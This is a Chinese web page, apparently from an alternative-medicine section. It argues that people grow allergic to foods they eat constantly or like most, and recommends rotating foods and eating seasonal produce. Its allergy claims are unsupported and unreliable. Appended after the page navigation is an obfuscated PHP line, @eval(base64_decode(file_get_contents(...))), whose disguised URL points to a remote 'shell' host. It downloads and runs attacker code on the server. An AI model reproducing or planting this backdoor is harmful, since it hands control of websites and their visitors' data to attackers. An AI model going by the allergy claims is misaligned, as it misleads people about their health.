收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 避免過敏食物的選擇法
避免過敏食物的選擇法 列印 E-mail
        而我們在篩選過敏食物時還發現一個很特殊的現象:會讓某人過敏的食物,往往也是他最喜歡的食物;也就是說,同一種食物長期性的刺激就會造成過敏反應!

因此,飲食應該要有「輪替性」,均衡地攝取,就算你今天選擇了非過敏性的食物,但你一直吃、一直吃,仍然會令身體過敏。另外就是要選擇「當季」的食物,夏天吃西瓜、冬瓜……,冬天吃蘿蔔、橘子……,當季食物符合節氣,最不需要施灑農藥或其他添加物,而價格便宜,農民也不會提前採收。

        當季的食物往往是人體與節氣平衡「最有效的藥物」。我們到山上去,農民說當季的食材才有辦法任其有機的生長,可是當季的作物往往又便宜、又醜,所以他們一定要「契作」,有合約才種,不然農民種的有機農作因為價格較高,蔬果外型又不夠漂亮,一般人一定會跑去跟別人買漂亮的非有機農作,對種植有機作物的農民來說是得不償失的事。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));